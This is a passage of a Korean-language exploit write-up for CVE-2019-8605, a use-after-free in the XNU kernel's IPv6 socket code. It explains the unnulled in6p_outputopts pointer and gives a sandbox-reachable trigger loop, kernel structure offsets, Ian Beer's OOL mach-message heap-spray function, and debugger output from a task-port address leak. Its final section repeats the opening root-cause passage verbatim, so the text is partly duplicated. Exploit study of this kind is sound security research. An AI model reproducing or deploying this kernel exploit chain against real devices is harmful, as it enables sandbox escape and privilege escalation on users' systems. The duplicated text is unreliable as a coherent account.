\ubc84\uadf8\uc5d0 \ub300\ud55c \uadfc\ubcf8 \uc6d0\uc778 \ubd84\uc11d<\/h2>\nvoid in6_pcbdetach(struct inpcb *inp) {\n \/\/ ...\n if (!(so->so_flags & SOF_PCBCLEARING)) {\n struct ip_moptions *imo;\n struct ip6_moptions *im6o;\n\n inp->inp_vflag = 0;\n if (inp->in6p_options != NULL) {\n m_freem(inp->in6p_options);\n inp->in6p_options = NULL; \/\/ <- \uc62c\ubc14\ub974\uac8c NULL \ucc98\ub9ac (GOOD)\n }\n ip6_freepcbopts(inp->in6p_outputopts); \/\/ <- \ud574\uc81c\ub9cc \ud568, NULL \ucc98\ub9acX (BAD)\n \/\/ \ub9e4\ud551\ub41c \uc8fc\uc18c\uc758 \uacbd\uc6b0 IPv4 \uad00\ub828 \ub9ac\uc18c\uc2a4 \ud574\uc81c\n ROUTE_RELEASE(&inp->in6p_route);\n if (inp->inp_options != NULL) {\n (void)m_free(inp->inp_options); \/\/ <- \uc62c\ubc14\ub974\uac8c NULL \ucc98\ub9ac, (GOOD)\n inp->inp_options = NULL;\n }\n \/\/ ...\n }\n}\n\n<\/code><\/pre>\n\ubc84\uadf8\uac00 \ubc1c\uc0dd\ud558\ub294 \ucf54\ub4dc\ub294 \uc704\uc640 \uac19\ub2e4.<\/p>\n
ip6_freepcbopts<\/code> \ud568\uc218\ub97c \ud1b5\ud574 inp->in6p_outputopts<\/code> \uac00 \ud574\uc81c\ub418\uc9c0\ub9cc,\nNULL\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4\ub294 \uc810\uc774\ub2e4.<\/p>\n\uc774\ub807\uac8c NULL \uc124\uc815\ub418\uc5b4 \uc788\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc5ec\uc804\ud788 \ud574\uc81c\ub41c \uba54\ubaa8\ub9ac \uc601\uc5ed\uc744 \uac00\ub9ac\ud0a4\uace0 \ub0a8\uc544\uc788\ub294 \uc8fc\uc18c\ub97c\n\ubc14\ub85c \ub315\uae00\ub9c1 \ud3ec\uc778\ud130 (dangling pointer)\ub77c\uace0 \ubd80\ub978\ub2e4.<\/strong><\/p>\nip6_freepcbopts<\/code> \ud568\uc218\ub294 \uc5b4\ub5bb\uac8c \ud558\uba74 \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\uc744\uae4c?<\/p>\nhttps:\/\/newosxbook.com\/xxr\/index.php?q=ip6_freepcbopts&ver=xnu-4903.221.2&case=false&def=false<\/a><\/p>\n\ub9ac\ub205\uc2a4 \ucee4\ub110 \uc0b4\ud3b4\ubcfc\ub54c elixir\uc640 \ube44\uc2b7\ud55c \uc0ac\uc774\ud2b8\ub97c \ucc3e\uc558\ub294\ub370\n\uc544\ub798\uc640 \uac19\uc774 \ucd94\uc801\ud560 \uc218 \uc788\ub2e4.<\/p>\n
Case-insensitive search for in6_pcbdetach in XNU version 4903.221.2\n bsd\/netinet6\/udp6_usrreq.c\t689: in6_pcbdetach(inp);\n894: in6_pcbdetach(inp);\n bsd\/netinet6\/in6_pcb.h\t101:extern void in6_pcbdetach(struct inpcb *);\n bsd\/netinet6\/in6_pcb.c\t170: in6_pcbdetach(inp);\n631: in6_pcbdetach(inp);\n635:in6_pcbdetach(struct inpcb *inp) definition\n bsd\/netinet6\/raw_ip6.c\t829: in6_pcbdetach(inp);\n bsd\/netinet\/udp_usrreq.c\t2477: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_usrreq.c\t2701: in6_pcbdetach(inp);\n bsd\/netinet\/raw_ip.c\t1071: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_timer.c\t613: in6_pcbdetach(inp);\n658: in6_pcbdetach(inp);\n bsd\/netinet\/flow_divert.c\t2694: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_subr.c\t1591: in6_pcbdetach(inp);\n\nvoid\nin6_pcbdetach(struct inpcb *inp);\nbsd\/netinet6\/in6_pcb.c\t681: ip6_freepcbopts(inp->in6p_outputopts);\n\nbsd\/netinet6\/ip6_output.c\t3345:ip6_freepcbopts(struct ip6_pktopts *pktopt) definition\n<\/code><\/pre>\n\ub2e4\uc2dc \ub3cc\uc544\uc640\uc11c\u2026<\/p>\n
\uc5ec\uae30\uc11c \ubb38\uc81c\ub294 inp->in6p_outputopts<\/code> \uac00 \ud574\uc81c\ub418\uc9c0\ub9cc NULL\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4\ub294 \uac83\uc774\ub2e4.<\/p>\n\uc18c\ucf13\uc744 \ud30c\uad34\ud558\uc9c0 \uc54a\uace0 \uc5f0\uacb0\uc744 \ub04a\uc73c\uba74 \uc774 \uc870\uac74\uc5d0 \ub3c4\ub2ec\ud560 \uc218 \uc788\ub2e4\uace0 \ucd94\uac00\uc801\uc73c\ub85c \uc124\uba85\ub418\uc5c8\ub2e4.<\/p>\n
\uac1c\ub150 \uc99d\uba85 \ucf54\ub4dc<\/h2>\n
\uc0cc\ub4dc\ubc15\uc2a4 \ub0b4\uc5d0\uc11c \ub2e4\uc74c PoC\uac00 \uc801\uc6a9\ub41c\ub2e4.<\/p>\n
while (1) {\n int s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);\n\n \/\/ \uc5f0\uacb0\uc744 \ub04a\uc740 \ud6c4 (\uadf8\ub9ac\uace0 \uc18c\ucf13 \uc635\uc158\uc744 \ud574\uc81c\ud55c \ud6c4) setsockopt \ud5c8\uc6a9\n struct so_np_extensions sonpx = {\n .npx_flags = SONPX_SETOPTSHUT,\n .npx_mask = SONPX_SETOPTSHUT\n };\n setsockopt(s, SOL_SOCKET, SO_NP_EXTENSIONS, &sonpx, sizeof(sonpx));\n\n int minmtu = -1;\n setsockopt(s, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu)); \/\/ in6p_outputops \ud560\ub2f9\n disconnectx(s, 0, 0); \/\/ in6p_outputopts \ud574\uc81c\n **setsockopt(s, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu)); \/\/ UAF \ubc1c\uc0dd**\n close(s);\n}\n\n<\/code><\/pre>\nExploit<\/h1>\n1. Dangling ptr\uc744 \ud65c\uc6a9\ud55c task port \uc720\ucd9c<\/h2>\n
\uc774\uc81c \ubc84\uadf8\uc640 \ud2b8\ub9ac\uac70 \ubc29\ubc95\uc744 \uc54c\uc558\uc73c\ub2c8 \uc775\uc2a4\ud50c\ub85c\uc787\uc73c\ub85c \ub118\uc5b4\uac00\ubcf4\uc790.<\/p>\n
\uc774\uac83\uc740 UAF \ubc84\uadf8\uc774\ubbc0\ub85c "\ud799 \uc2a4\ud504\ub808\uc774"\ub77c\ub294 \uae30\uc220\uc774 \uc0ac\uc6a9\ub41c\ub2e4.<\/p>\n
UAF\ub41c \uac1d\uccb4\ub294 \ud574\uc81c\ub418\uc5c8\ub294\ub370, \ud574\uc81c\ub41c \uba54\ubaa8\ub9ac\uc640 \ud574\uc81c\ub418\uc9c0 \uc54a\uc740 \uba54\ubaa8\ub9ac\uc758 \ucc28\uc774\ub294\u2026 \ubb34\uc5c7\uc77c\uae4c?<\/p>\n
\ud574\uc81c\ub41c \uba54\ubaa8\ub9ac\ub294 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4. \ub2e4\uc74c \ud560\ub2f9\uc774 \ud574\uc81c\ub41c \uac1d\uccb4\uac00 \uc788\ub358 \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub0a0 \uac00\ub2a5\uc131\uc774 \uc788\uc73c\uba70, \uc774\ub7f0 \uc2dd\uc73c\ub85c \ud574\ub2f9 \uac1d\uccb4\uc758 \ub370\uc774\ud130\ub97c \uc81c\uc5b4\ud560 \uc218 \uc788\ub2e4.<\/p>\n
\uc774\uc81c \ub5a0\uc624\ub974\ub294 \uc9c8\ubb38\uc740:<\/p>\n
\n- \n
\ucee4\ub110\uc5d0\uac8c \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\ub77c\uace0 \uc5b4\ub5bb\uac8c \uc9c0\uc2dc\ud558\ub098?<\/p>\n<\/li>\n
- \n
\uc5b4\ub5bb\uac8c \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub098\ub294\uc9c0 \ud655\uc778\ud560 \uc218 \uc788\ub098?<\/p>\n<\/li>\n<\/ol>\n
\ud799\uc2a4\ud504\ub808\uc774.<\/p>\n
\ub370\uc774\ud130\uac00 \uc5b4\ub514\ub85c \uac00\ub294\uc9c0 \uc81c\uc5b4\ud560 \uc218 \uc5c6\uae30 \ub54c\ubb38\uc5d0 \ub9ce\uc740 \ud560\ub2f9\uc744 \ud558\uace0\n\uc6b0\ub9ac\uac00 \uc6d0\ud558\ub294 \uacf3\uc5d0 \ub3c4\ucc29\ud558\uae30\ub97c \uae30\ub2e4\ub9b0\ub2e4\u2026<\/p>\n
\uadf8\uac83\uc774 \ub3c4\ucc29\ud588\ub294\uc9c0 \uc5b4\ub5bb\uac8c \ud655\uc778\ud558\ub294\uc9c0\ub294 \uc6b0\ub9ac\uac00 UAF\ud55c \uac1d\uccb4\uc5d0 \ub530\ub77c \ub2e4\ub974\uc9c0\ub9cc,\n\uc774 \uacbd\uc6b0\uc5d0\ub294 \uac00\ub2a5\ud558\uba70 \ub9e4\uc6b0 \uac04\ub2e8\ud558\ub2e4.<\/p>\n
\n- \uc5b4\ub5a4 \ub370\uc774\ud130\ub97c \ub123\uc5b4\uc57c \ud558\ub098?<\/li>\n<\/ol>\n
IOSurface\ub098 mach \uba54\uc2dc\uc9c0\uc640 \uac19\uc740 \uc5ec\ub7ec \uac00\uc9c0 \ubc29\ubc95\uc774 \uc874\uc7ac\ud55c\ub2e4.<\/strong><\/p>\n(\ucc38\uace0: \ucee4\ub110 \uba54\ubaa8\ub9ac\ub294 \ud560\ub2f9 \ud06c\uae30\uc5d0 \ub530\ub77c \uc601\uc5ed\uc73c\ub85c \uad6c\uc131\ub418\ubbc0\ub85c, \uc6b0\ub9ac\uac00 \ub9cc\ub4dc\ub294 \ud560\ub2f9\uc740 UAF\ub41c \uac1d\uccb4\uc640 \ub3d9\uc77c\ud55c \ud06c\uae30\uc5ec\uc57c \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub0a0 \uc218 \uc788\uc74c. \uc774\uc5d0 \ub300\ud55c \uc790\uc138\ud55c \ub0b4\uc6a9\uc740 \ub098\uc911\uc5d0 \uc124\uba85).<\/p>\n
IOSurface\ub294 \uadf8\ub798\ud53d\uc5d0 \uc0ac\uc6a9\ub418\ub294 \ucee4\ub110 \ud655\uc7a5\uc73c\ub85c, \uc0cc\ub4dc\ubc15\uc2a4\uc5d0\uc11c \uc811\uadfc \uac00\ub2a5\ud558\uba70 \uc0ac\uc6a9\uc790 \uc815\uc758 \ud06c\uae30\uc758 \ub370\uc774\ud130\ub97c \ucee4\ub110\ub85c \uac00\uc838\uc62c \uc218 \uc788\ub294 \uba54\uc11c\ub4dc\ub97c \uc81c\uacf5\ud55c\ub2e4.<\/p>\n
Mach \uba54\uc2dc\uc9c0\ub294 \ud504\ub85c\uc138\uc2a4 \uac04 \ud1b5\uc2e0\uc5d0 \uc0ac\uc6a9\ub418\uc9c0\ub9cc, \ucee4\ub110\uc774 \ubaa8\ub4e0 \ud504\ub85c\uc138\uc2a4\ub97c \uad00\ub9ac\ud558\ubbc0\ub85c \ub370\uc774\ud130\ub97c \uba3c\uc800 \ucee4\ub110\ub85c \ubcf4\ub0b8\ub2e4. \ub530\ub77c\uc11c \uc774 \ubc29\ubc95\uc744 \uc0ac\uc6a9\ud558\uc5ec \ub370\uc774\ud130\ub97c \ucee4\ub110\ub85c \ubcf4\ub0b4\ub294\uac8c \uac00\ub2a5\ud558\ub2e4.<\/strong><\/p>\n\uba3c\uc800 \ub315\uae00\ub9c1 \ud3ec\uc778\ud130\uc778 inp->in6p_outputopts<\/code> \uac00 \ubb54\uc9c0 \uc0b4\ud3b4\ubcf4\uc790<\/p>\n\ud0c0\uc785\uc740 struct ip6_pktopts *<\/code> \uc774\ub2e4.<\/p>\nvoid ip6_freepcbopts(struct ip6_pktopts *);\n<\/code><\/pre>\nproc \uad6c\uc870\uccb4\uc5d0\uc11c \ub3c4\ub2ec\ud558\ub294 \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n
our proc struct \n-> struct filedesc (named p_fd, offset = 0x100 or 0x108 on iOS 11) \n-> struct fileproc array (named fd_ofiles, offset = 0) \n-> \uc18c\ucf13 \ud30c\uc77c \ub514\uc2a4\ud06c\ub9bd\ud130\ub97c \uc778\ub371\uc2a4\ub85c \ud558\ub294 \uc694\uc18c \n-> struct fileglob (named f_fglob, offset = 8) \n-> struct socket (named fg_data, offset = 56) \n-> struct inpcb (named so_pcb, offset = 16) \n-> struct ip6_pktopts (named inp6_outputopts, offset = 304). \n<\/code><\/pre>\n\uc774\uc81c "struct ip6_pktopts<\/code>"\ub97c \uc0b4\ud3b4\ubcf4\uba74,<\/p>\nstruct ip6_pktopts {\n struct mbuf *ip6po_m;\n int ip6po_hlim;\n **struct in6_pktinfo *ip6po_pktinfo;**\n struct ip6po_nhinfo ip6po_nhinfo;\n struct ip6_hbh *ip6po_hbh;\n struct ip6_dest *ip6po_dest1;\n struct ip6po_rhinfo ip6po_rhinfo;\n struct ip6_dest *ip6po_dest2;\n **int ip6po_tclass;**\n **int ip6po_minmtu;**\n **int ip6po_prefer_tempaddr;**\n int ip6po_flags;\n};\n<\/code><\/pre>\n\uc5ec\uae30\uc5d0\uc11c **get\/setsockopt<\/code>**\ub97c \uc0ac\uc6a9\ud558\uc5ec<\/p>\nip6po_pktinfo<\/code><\/p>\nip6po_tclass<\/code><\/p>\nip6po_minmtu<\/code><\/p>\nip6po_prefer_tempaddr<\/code><\/p>\n\ud544\ub4dc\ub97c \uc81c\uc5b4\ud560 \uc218 \uc788\ub2e4\uace0 \ud55c\ub2e4.<\/p>\n
\ucde8\uc57d\uc810\uc744 \uc0ac\uc6a9\ud558\uc5ec \uc6d0\ud560 \ub54c\ub9c8\ub2e4 \uc774 \uad6c\uc870\uccb4\ub97c \ud574\uc81c\ud558\uace0,\n\ud799 \uc2a4\ud504\ub808\uc774\ub97c \uc0ac\uc6a9\ud558\uc5ec \uc6d0\ud558\ub294 \ub0b4\uc6a9\uc73c\ub85c \ud560\ub2f9\ud560 \uc218 \uc788\ub2e4\ub294 \uac83\uc744 \ub2e4\uc2dc\ud55c\ubc88 \uc0c1\uae30\ud558\uc790.<\/p>\n
\uc6b0\ub9ac\uac00 \uba3c\uc800 \ud560 \uc218 \uc788\ub294 \ud55c \uac00\uc9c0\ub294 data leak\uc774\ub2e4.<\/p>\n
int ip6po_minmtu;<\/code><\/p>\nint ip6po_prefer_tempaddr;<\/code><\/p>\n\uc640 \uac19\uc740 \uc815\uc218\ub97c \uc77d\uc744 \uc218 \uc788\ub2e4.<\/p>\n
\uc774\ub97c \ud1b5\ud574 \uc6b0\ub9ac \ud0dc\uc2a4\ud06c \ud3ec\ud2b8\uc758 \ucee4\ub110 \uc8fc\uc18c\ub97c \uc720\ucd9c\ud560 \uc218 \uc788\ub2e4.<\/p>\n
\uc5b4\ub5bb\uac8c \ud558\uba74 \uac00\ub2a5\ud560\uae4c?\nOOL \uba54\uc2dc\uc9c0\ub97c \ud65c\uc6a9\ud55c Ian Beer\uc758 \uac04\ub2e8\ud55c \uc2a4\ud504\ub808\uc774 \uae30\ubc95\uc744 \uc0ac\uc6a9\ud55c\ub2e4.<\/p>\n
OOL \uba54\uc2dc\uc9c0\ub294 XNU\uc758 \ud504\ub85c\uc138\uc2a4 \uac04 \ud1b5\uc2e0(IPC) \uba54\ucee4\ub2c8\uc998\uc5d0 \uc911\uc694\ud558\uac8c \uc4f0\uc774\uae30\ub3c4 \ud558\uba70,\n\uba54\uc2dc\uc9c0\ub97c \uc218\uc2e0\ud558\uae30 \uc804\uae4c\uc9c0 \uacc4\uc18d \ucee4\ub110 \uacf5\uac04\uc5d0 \ub0a8\uc544\ub450\uac8c \ub9cc\ub4e4 \uc218 \uc788\ub2e4.<\/p>\n
https:\/\/dmcyk.xyz\/post\/xnu_ipc_iii_ool_data\/<\/a><\/p>\n\uc5ec\uae30\uc11c \uad00\uc2ec \uc788\ub294 \uac1d\uccb4, \uc608\ub97c \ub4e4\uc5b4 \ud3ec\ud2b8 \uad8c\ud55c(port right)<\/strong> \u2014 \uc744 \uc120\ud0dd\ud558\uace0,\n\ud574\ub2f9 \ud3ec\ud2b8 \uad8c\ud55c\uc744 \uc5ec\ub7ec \ubc88 \ubcf5\uc0ac\ud55c OOL(Out-Of-Line) \ub514\uc2a4\ud06c\ub9bd\ud130<\/strong>\uac00 \ud3ec\ud568\ub41c Mach \uba54\uc2dc\uc9c0\ub97c \uc900\ube44\ud55c\ub2e4.<\/p>\n\uc55e\uc11c \ubcf8 \uae30\uc220\uc744 \uc0ac\uc6a9\ud574 \uc774 \uba54\uc2dc\uc9c0\ub97c \ub2e4\ub978 \uc784\uc2dc \ud3ec\ud2b8(ephemeral port)<\/strong> \ub85c \uc804\uc1a1\ud558\uba74,\n\uacb0\uacfc\uc801\uc73c\ub85c \ud3ec\ud2b8 \ub514\uc2a4\ud06c\ub9bd\ud130\uac00 kalloc<\/code> \uc874\uc5d0 \uc5ec\ub7ec \ubc88 \ubcf5\uc0ac\ub418\uac8c \ub41c\ub2e4.<\/p>\n\ucf54\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n
\/\/ from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {\n mach_port_t q = MACH_PORT_NULL;\n kern_return_t err;\n err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n if (err != KERN_SUCCESS) {\n printf("[-] failed to allocate port\\n");\n return 0;\n }\n \n mach_port_t* ports = malloc(sizeof(mach_port_t) * count);\n for (int i = 0; i < count; i++) {\n ports[i] = target_port;\n }\n \n struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));\n \n msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);\n msg->hdr.msgh_remote_port = q;\n msg->hdr.msgh_local_port = MACH_PORT_NULL;\n msg->hdr.msgh_id = 0x41414141;\n \n msg->body.msgh_descriptor_count = 1;\n \n msg->ool_ports.address = ports;\n msg->ool_ports.count = count;\n msg->ool_ports.deallocate = 0;\n msg->ool_ports.disposition = disposition;\n msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;\n msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;\n \n err = mach_msg(&msg->hdr,\n MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n msg->hdr.msgh_size,\n 0,\n MACH_PORT_NULL,\n MACH_MSG_TIMEOUT_NONE,\n MACH_PORT_NULL);\n \n if (err != KERN_SUCCESS) {\n printf("[-] failed to send message: %s\\n", mach_error_string(err));\n return MACH_PORT_NULL;\n }\n \n return q;\n}\n<\/code><\/pre>\n\uc704 \ucf54\ub4dc\uc5d0\uc11c \uc8fc\ubaa9\ud560 \uc810\uc740, \uba54\uc2dc\uc9c0\uac00 \uc804\uc1a1(MACH_SEND_MSG)<\/strong> \ub418\uc9c0\ub9cc \uc218\uc2e0\ub418\uc9c0\ub294 \uc54a\ub294\ub2e4<\/strong>\ub294 \uc810\uc774\ub2e4.<\/p>\n\uc774\ub807\uac8c \ud558\uba74 \uba54\uc2dc\uc9c0\uac00 \uc218\uc2e0\ub418\uac70\ub098, \uba54\uc2dc\uc9c0\uc758 \ub300\uc0c1 \ud3ec\ud2b8\uac00 \ud30c\uad34\ub418\uae30 \uc804\uae4c\uc9c0\ub294 \ud3ec\ud2b8 \uc2a4\ud504\ub808\uc774\uac00 \ucee4\ub110 \uacf5\uac04\uc5d0 \ub0a8\uc544 \uc788\uac8c<\/strong> \ub41c\ub2e4.<\/p>\n\uc774 \ub54c\ubb38\uc5d0 \uc2a4\ud504\ub808\uc774 \ud568\uc218\ub294 \ub300\uc0c1 \ud3ec\ud2b8(target port)<\/strong> \ub97c \ubc18\ud658\ud55c\ub2e4. \ucee4\ub110 \ub0b4\ubd80\uc5d0\uc11c \ubcf5\uc0ac\uac00 \uc644\ub8cc\ub41c \ud6c4, \ud574\ub2f9 \ud3ec\ud2b8\ub97c \uace7\ubc14\ub85c \ud574\uc81c\ud558\uace0, \uc8fc\uc18c \uc720\ucd9c\uc744 \uc2dc\ub3c4\ud55c\ub2e4.<\/p>\n\ucee4\ub110 \uc874(zone)\uc758 \ud3ec\uc778\ud130\ub294 \ud56d\uc0c1 0xffffff8.........<\/code> \ud615\ud0dc\ub97c \ub748\ub2e4\u2026 \ub530\ub77c\uc11c \uc720\ucd9c\ub41c \uc8fc\uc18c\uac00 8\ubc14\uc774\ud2b8 \uc911 \uc0c1\uc704 1\ubc14\uc774\ud2b8\uac00 0<\/strong>\uc77c\uc9c0\ub77c\ub3c4(\uc989, 7\ubc14\uc774\ud2b8\ub9cc \uc720\ucd9c\ub418\ub354\ub77c\ub3c4<\/strong>), \ud574\ub2f9 \uac12\uc774 \ucee4\ub110 \ud3ec\uc778\ud130\ub77c\ub294 \uac83\uc744 \uc54c\uc544\ubcfc \uc218 \uc788\ub2e4.<\/p>\n\uc608\uc2dc\ub85c \uc544\ub798 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ucf1c\uc11c \ub514\ubc84\uae45\ud574\uc11c \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n
int main(int argc, char *argv[], char *envp[]) {\n\n mach_port_t p = fill_kalloc_with_port_pointer(mach_task_self(), 192\/sizeof(uint64_t), MACH_MSG_TYPE_COPY_SEND);\n printf("p: 0x%x\\n", p);\n while(1) {};\n\n return 0;\n}\n<\/code><\/pre>\n\uc6b0\uc120\uc740 \uc800 192\ud06c\uae30\ub9cc\ud07c kalloc\uc744 \uc218\ud589\ud558\ub294\uacf3\uc740\n\ub0b4\ubd80\uc801\uc73c\ub85c ipc_kmsg_copyin_ool_ports_descriptor<\/code> \ud568\uc218\uc5d0\uc11c \ud638\ucd9c\ub41c\ub2e4.<\/p>\nQEMU\ub85c \ub514\ubc84\uae45\ud558\ub294\ub370.\n\uac00\uc0c1 \ud638\uc2a4\ud2b8\ub9e5\uc5d0\uc11c lldb\uc640 \uc6b0\ubd84\ud22c\uc5d0\uc11c gdb-gef \ub3d9\uc2dc\uc5d0 \ud63c\uc6a9\ud574\uc11c \ub514\ubc84\uae45\ud560 \ud544\uc694\uac00 \uc788\uc5c8\ub2e4.<\/p>\n
Target 0: (kernel) stopped.\n(lldb) p\/x ipc_kmsg_copyin_ool_ports_descriptor\n(mach_msg_descriptor_t *(*)(mach_msg_ool_ports_descriptor_t *, mach_msg_descriptor_t *, int, vm_map_t, ipc_space_t, ipc_object_t, ipc_kmsg_t, mach_msg_option_t *, mach_msg_return_t *)) $0 = 0xffffff801778df60 (kernel`ipc_kmsg_copyin_ool_ports_descriptor at ipc_kmsg.c:2810)\n\n# ipc_kmsg_copyin_ool_ports_descriptor \ud568\uc218 \uc8fc\uc18c\ub294 0xffffff801778df60 \n# \ub0b4\ubd80\uc801\uc73c\ub85c kalloc\uc774 ipc_kmsg_copyin_ool_ports_descriptor+0xe9\uc5d0\uc11c call \ub428.\n# \ube0c\ud3ec\ub97c \uac80\ngef> b *0xffffff801778df60+0xe9\nBreakpoint 2 at 0xffffff801778e049\n\n# kalloc \ud560\ub2f9 \uc8fc\uc18c\ub294 ipc_kmsg_copyin_ool_ports_descriptor+0xee, \uc989 call \ubc14\ub85c \uc9c1\ud6c4\uc5d0 \ube0c\ud3ec\ub97c \uac78\uc5b4 \ud655\uc778\ngef> b *0xffffff801778df60+0xee\nBreakpoint 3 at 0xffffff801778e04e\n<\/code><\/pre>\n\uc704\uc640 \uac19\uc740 \uc870\uae08 \uae4c\ub2e4\ub85c\uc6b4 \ubc29\ubc95\uc73c\ub85c \ub514\ubc84\uae45\ud558\ub2e4\ubcf4\uba74, kalloc \ud568\uc218 \ud638\ucd9c\ud558\ub294\ub370\uc5d0\uc11c<\/p>\n
![\"image.png\"](\"https:\/\/raw.githubusercontent.com\/wh1te4ever\/xnu_1day_practice\/refs\/heads\/main\/CVE-2019-8605\/pics\/image.png\")
<\/p>\n
0xc0(=192) \ud06c\uae30\ub97c \ud560\ub2f9\ud558\ub294 \ubaa8\uc2b5\uc744 \ubcfc \uc218 \uc788\uc744\ud150\ub370,<\/p>\n
![\"image.png\"](\"https:\/\/raw.githubusercontent.com\/wh1te4ever\/xnu_1day_practice\/refs\/heads\/main\/CVE-2019-8605\/pics\/image%201.png\")
<\/p>\n
\ud560\ub2f9\ub41c \uc8fc\uc18c\ub294 0xffffff801f79a540\uc774\ub2e4.<\/p>\n
\uc774\ud6c4 \uacc4\uc18d \uc2e4\ud589\uc2dc\ud0a4\uace0 \ub2e4\uc2dc \ud560\ub2f9\uc8fc\uc18c\ub97c \ud655\uc778\ud574\ubcf4\uba74,<\/p>\n
![\"image.png\"](\"https:\/\/raw.githubusercontent.com\/wh1te4ever\/xnu_1day_practice\/refs\/heads\/main\/CVE-2019-8605\/pics\/image%202.png\")
<\/p>\n
\uc704\uc640 \uac19\uc740 \uac12\uc774 \uc5f0\uc18d\uc801\uc73c\ub85c \ucc44\uc6cc\uc9c4\uac83\uc744 \ubcfc \uc218 \uc788\ub2e4.\n\uc774\uac83\uc774 \ubc14\ub85c \uc6b0\ub9ac \ud504\ub85c\uc138\uc2a4\uc758 task \uc8fc\uc18c\uc774\ub2e4.<\/p>\n
void in6_pcbdetach(struct inpcb *inp) {\n \/\/ ...\n if (!(so->so_flags & SOF_PCBCLEARING)) {\n struct ip_moptions *imo;\n struct ip6_moptions *im6o;\n\n inp->inp_vflag = 0;\n if (inp->in6p_options != NULL) {\n m_freem(inp->in6p_options);\n inp->in6p_options = NULL; \/\/ <- \uc62c\ubc14\ub974\uac8c NULL \ucc98\ub9ac (GOOD)\n }\n ip6_freepcbopts(inp->in6p_outputopts); \/\/ <- \ud574\uc81c\ub9cc \ud568, NULL \ucc98\ub9acX (BAD)\n \/\/ \ub9e4\ud551\ub41c \uc8fc\uc18c\uc758 \uacbd\uc6b0 IPv4 \uad00\ub828 \ub9ac\uc18c\uc2a4 \ud574\uc81c\n ROUTE_RELEASE(&inp->in6p_route);\n if (inp->inp_options != NULL) {\n (void)m_free(inp->inp_options); \/\/ <- \uc62c\ubc14\ub974\uac8c NULL \ucc98\ub9ac, (GOOD)\n inp->inp_options = NULL;\n }\n \/\/ ...\n }\n}\n\n<\/code><\/pre>\n\ubc84\uadf8\uac00 \ubc1c\uc0dd\ud558\ub294 \ucf54\ub4dc\ub294 \uc704\uc640 \uac19\ub2e4.<\/p>\n
ip6_freepcbopts<\/code> \ud568\uc218\ub97c \ud1b5\ud574 inp->in6p_outputopts<\/code> \uac00 \ud574\uc81c\ub418\uc9c0\ub9cc,\nNULL\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4\ub294 \uc810\uc774\ub2e4.<\/p>\n\uc774\ub807\uac8c NULL \uc124\uc815\ub418\uc5b4 \uc788\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc5ec\uc804\ud788 \ud574\uc81c\ub41c \uba54\ubaa8\ub9ac \uc601\uc5ed\uc744 \uac00\ub9ac\ud0a4\uace0 \ub0a8\uc544\uc788\ub294 \uc8fc\uc18c\ub97c\n\ubc14\ub85c \ub315\uae00\ub9c1 \ud3ec\uc778\ud130 (dangling pointer)\ub77c\uace0 \ubd80\ub978\ub2e4.<\/strong><\/p>\nip6_freepcbopts<\/code> \ud568\uc218\ub294 \uc5b4\ub5bb\uac8c \ud558\uba74 \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\uc744\uae4c?<\/p>\nhttps:\/\/newosxbook.com\/xxr\/index.php?q=ip6_freepcbopts&ver=xnu-4903.221.2&case=false&def=false<\/a><\/p>\n\ub9ac\ub205\uc2a4 \ucee4\ub110 \uc0b4\ud3b4\ubcfc\ub54c elixir\uc640 \ube44\uc2b7\ud55c \uc0ac\uc774\ud2b8\ub97c \ucc3e\uc558\ub294\ub370\n\uc544\ub798\uc640 \uac19\uc774 \ucd94\uc801\ud560 \uc218 \uc788\ub2e4.<\/p>\n
